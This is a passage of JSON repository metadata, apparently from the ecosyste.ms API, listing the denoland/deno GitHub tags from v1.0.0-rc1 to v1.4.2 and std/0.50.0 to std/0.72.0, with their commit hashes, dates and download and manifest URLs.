0-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/